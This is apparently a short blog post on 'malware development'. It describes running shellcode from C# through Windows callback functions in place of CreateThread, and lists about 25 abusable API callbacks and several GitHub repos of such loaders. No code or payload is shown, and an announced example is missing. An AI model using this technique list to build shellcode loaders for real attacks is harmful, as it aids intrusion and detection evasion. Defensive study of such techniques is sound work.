Malware Development: CSharp Alterntive Shellcode Callbacks
For a while now, people have been using alternative callback methods in C/CSharp payloads instead of the vanilla CreateThread()
or similar Windows API functions. There were several good repos on GitHub that can be used as resources to execute shellcode via Windows callback functions which were very interesting.
To touch on the technical details of this functionality, Windows callback functions are “code within a managed application that helps an unmanaged DLL function complete a task. Calls to a callback function pass indirectly from a managed application, through a DLL function, and back to the managed implementation.” (Source: MSDN Windows Callback Functions
Simpuly put, callback functions can be used to execute a task from your code (such as exeucuting shellcode)! Your code with callback functions would look like this:
Some of the most common callback functions that you may have heard of are EnumFontFamilies(), EnumPrinters(), and EnumWindows(). On top of that, there were MANY more documented callback functions that could be abused to execute shellcode in Windows. Here are some of the favourites shared with me or that I came across myself:
- DamonMohammadbagher/NativePayload_CB
- aahmad097/AlternativeShellcodeExec
- VX Underground Windows malware
- Wra7h/FlavorTown
I realized that there were numerous resources for C/C++ code samples to execute shellcode via callback funtions, but fewer resources available for CSharp. So I decided to convert some C code callback samples to their CSharp equivalents or attempt to discover undocumented callback functions for shellcode execution.
Below is a list of all the callback functions I’ve created malware samples for (so far) to execute shellcode in CSharp:
AddPropSheetPageProc
CertEnumSystemStore
CertEnumSystemStoreLocation
CreateTimerQueueTimer
CryptEnumOIDInfo
DSA_EnumCallback
EncryptedFileRaw
EnumDateFormatsA
EnumFontFamiliesW
EnumLanguageGroupLocalesW
EnumObjects
EnumSystemCodePagesA
EnumSystemGeoID
EnumerateLoadedModules
FiberContextEdit
ImmEnumInputContext
InitOnceExecuteOnce
LdrEnumerateLoadedModules
NotifyIpInterfaceChange
NotifyTeredoPortChange
SetTimer
SetupCommitFileQueueW
StackWalk
SymEnumProcesses
SymRegisterCallback
And finally, here is the GitHub repo of all the documented callback function malware samples I created in CSharp:
LINK: My CSharp Alternative Shellcode Callbacks repo